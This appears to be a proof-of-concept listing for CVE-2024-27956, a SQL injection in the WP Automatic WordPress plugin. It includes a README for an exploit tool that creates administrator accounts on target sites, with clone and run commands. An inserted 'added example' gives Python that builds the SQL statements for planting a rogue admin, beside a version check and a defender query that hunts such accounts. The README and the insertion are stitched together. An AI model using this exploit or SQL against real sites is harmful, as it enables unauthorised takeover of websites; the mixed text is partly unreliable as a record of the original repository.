
CVE-2024-27956 PoC — WordPress Automatic plugin <= 3.92.0 - Unauthenticated Arbitrary SQL Execution vulnerability

Associated vulnerability

Title: WordPress Automatic plugin <= 3.92.0 - Unauthenticated Arbitrary SQL Execution vulnerability (CVE-2024-27956)
Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection. This issue affects Automatic: from n/a through 3.92.0.

Repository description: CVE-2024-27956 - WP Automatic SQL Injection Exploit Tool

Readme



# WP Automatic Plugin SQL Injection Exploit (CVE-2024-27956)

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Vulnerability](https://img.shields.io/badge/CVE-2024-27956-critical-red)

A proof-of-concept exploit for the SQL injection vulnerability in WP Automatic plugin (CVE-2024-27956) affecting WordPress sites.

## 📌 Description

This exploit targets a critical unauthenticated SQL injection vulnerability in the WP Automatic plugin (versions 3.92.0 and earlier) for WordPress. Because the injected SQL runs against the site's database with no authentication, an attacker can insert a new administrator account and gain full control of the site.

## 🚀 Features

- Automated vulnerability verification
- Admin user creation with configurable credentials
- Automatic strong password generation
- Clean command-line interface

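The block below is an added example, not code from the devsec23 repository or from this README. It shows the two pieces the Features list describes once an arbitrary-SQL primitive exists: generating a strong password and the SQL that turns it into a WordPress administrator, plus the affected-version check from the advisory and a defender-side hunt query for accounts created this way. It assumes a `wp_` table prefix, a MySQL/MariaDB backend, a placeholder `@example.com` email, that WordPress still accepts a legacy raw-MD5 `user_pass` and re-hashes it on first login, and that the injection point runs one statement per request. It deliberately does not reproduce the HTTP request the tool sends, because this page does not document the vulnerable endpoint.

```python
import re
import secrets
import string
from typing import List, Tuple

# Affected range as stated in the advisory on this page: every release through 3.92.0.
LAST_AFFECTED_VERSION = "3.92.0"
PASSWORD_SYMBOLS = "!@#$%^&*-_"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a dotted plugin version such as '3.92.0' into a comparable tuple of ints."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        if not digits:          # stop at a non-numeric suffix such as 'beta'
            break
        parts.append(int(digits.group()))
    if not parts:
        raise ValueError("not a version string: %r" % version)
    return tuple(parts)


def is_affected(installed_version: str) -> bool:
    """True when the installed WP Automatic version is 3.92.0 or earlier (the advisory's range)."""
    return parse_version(installed_version) <= parse_version(LAST_AFFECTED_VERSION)


def generate_password(length: int = 20) -> str:
    """CSPRNG password containing at least one lowercase, uppercase, digit and symbol."""
    if length < 4:
        raise ValueError("length must be at least 4 to fit every character class")
    alphabet = string.ascii_letters + string.digits + PASSWORD_SYMBOLS
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if (any(c.islower() for c in candidate) and any(c.isupper() for c in candidate)
                and any(c.isdigit() for c in candidate)
                and any(c in PASSWORD_SYMBOLS for c in candidate)):
            return candidate


def sql_quote(value: str) -> str:
    """Quote a string for MySQL/MariaDB; backslash-escapes the two characters that end a literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_admin_sql(username: str, password: str, table_prefix: str = "wp_") -> List[str]:
    """SQL statements that create a WordPress administrator through an arbitrary-SQL primitive.

    Returned as separate statements so each can be sent as its own query (assumption: the
    injection point runs one statement per request). The usermeta inserts look the user up by
    user_login instead of LAST_INSERT_ID(), which would already point at the usermeta table's
    own auto-increment after the first meta row.
    """
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,60}", username):
        raise ValueError("username must be a plain WordPress login name")
    if not re.fullmatch(r"[A-Za-z0-9_]+", table_prefix):
        raise ValueError("table prefix must be an identifier")
    users, usermeta = table_prefix + "users", table_prefix + "usermeta"
    login, pwd = sql_quote(username), sql_quote(password)
    email = sql_quote(username + "@example.com")   # placeholder address (assumption)
    # Serialized PHP array granting the 'administrator' role; 13 is strlen('administrator').
    caps = sql_quote('a:1:{s:13:"administrator";b:1;}')
    return [
        # MD5() instead of a phpass hash: WordPress accepts a legacy 32-hex user_pass and
        # re-hashes it after the first successful login (assumption about the target's WP core).
        "INSERT INTO {t} (user_login, user_pass, user_nicename, user_email, user_registered, "
        "user_status, display_name) VALUES ({u}, MD5({p}), {u}, {e}, NOW(), 0, {u})".format(
            t=users, u=login, p=pwd, e=email),
        # The role lives under '<prefix>capabilities', so the meta_key follows the table prefix.
        "INSERT INTO {m} (user_id, meta_key, meta_value) SELECT ID, {k}, {v} FROM {t} "
        "WHERE user_login = {u}".format(m=usermeta, k=sql_quote(table_prefix + "capabilities"),
                                       v=caps, t=users, u=login),
        "INSERT INTO {m} (user_id, meta_key, meta_value) SELECT ID, {k}, '10' FROM {t} "
        "WHERE user_login = {u}".format(m=usermeta, k=sql_quote(table_prefix + "user_level"),
                                       t=users, u=login),
    ]


def hunt_unexpected_admins_sql(table_prefix: str = "wp_") -> str:
    """Defender-side query: every administrator, newest first, flagging raw-MD5 password hashes.

    WordPress itself writes '$P$' (phpass) or newer hashes, so a 32-hex user_pass means the row
    was written straight into the database, which is what an SQL-injection admin insert leaves.
    """
    return (
        "SELECT u.ID, u.user_login, u.user_email, u.user_registered, "
        "u.user_pass REGEXP '^[0-9a-f]{{32}}$' AS raw_md5 "
        "FROM {p}users u JOIN {p}usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = '{p}capabilities' AND m.meta_value LIKE '%administrator%' "
        "ORDER BY u.user_registered DESC"
    ).format(p=table_prefix)


if __name__ == "__main__":
    pw = generate_password()
    print("affected(3.92.0) =", is_affected("3.92.0"), "affected(3.92.1) =", is_affected("3.92.1"))
    for stmt in build_admin_sql("pentest", pw):
        print(stmt + ";")
    print(hunt_unexpected_admins_sql() + ";")
```

The hunt query is the check a responder wants after a site in the affected range has been exposed: an administrator row whose `user_pass` is a bare 32-hex digest, or whose `user_registered` timestamp is later than the last legitimate account, did not come through WordPress' own user creation path and should be investigated.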
## 🛠️ Installation

```bash
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
```

## 💻 Usage

### Basic exploitation:
```bash
python3 exploit.py http://vulnerable-site.com
```

### Custom username and password:
```bash
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
```

### Using a proxy:
```bash
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
```

## 📋 Options

```
positional arguments:
  url                   Target WordPress URL

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username for the new admin account
  -p PASSWORD, --password PASSWORD
                        Password for the new admin account
  --proxy PROXY         HTTP proxy to route requests through (see Usage above)
```

## ⚠️ Legal Disclaimer

This tool is provided for **educational and authorized penetration testing purposes only**. The developer is not responsible for any misuse of this software. Always obtain proper authorization before testing any systems.

## 📜 License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## 🔗 References

- [CVE-2024-27956 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-27956)
- [WP Automatic Plugin](https://wordpress.org/plugins/wp-automatic/)
- [WordPress Security Advisory](https://wordpress.org/news/category/security/)
